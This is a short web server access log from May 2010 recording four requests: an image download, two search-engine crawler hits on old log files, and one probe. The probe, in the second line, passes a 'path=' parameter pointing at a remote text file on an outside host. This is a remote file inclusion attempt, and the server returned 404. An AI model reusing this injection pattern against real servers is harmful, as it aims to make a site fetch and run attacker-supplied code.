92.28.251.186 - - [02/May/2010:08:53:04 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
218.38.34.19 - - [02/May/2010:08:53:42 -0500] "GET /logs/access_log.1263859200//?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:08:53:43 -0500] "GET /logs/access_log.1236988800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.98 - - [02/May/2010:08:53:54 -0500] "GET /logs/access_log.1194048000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
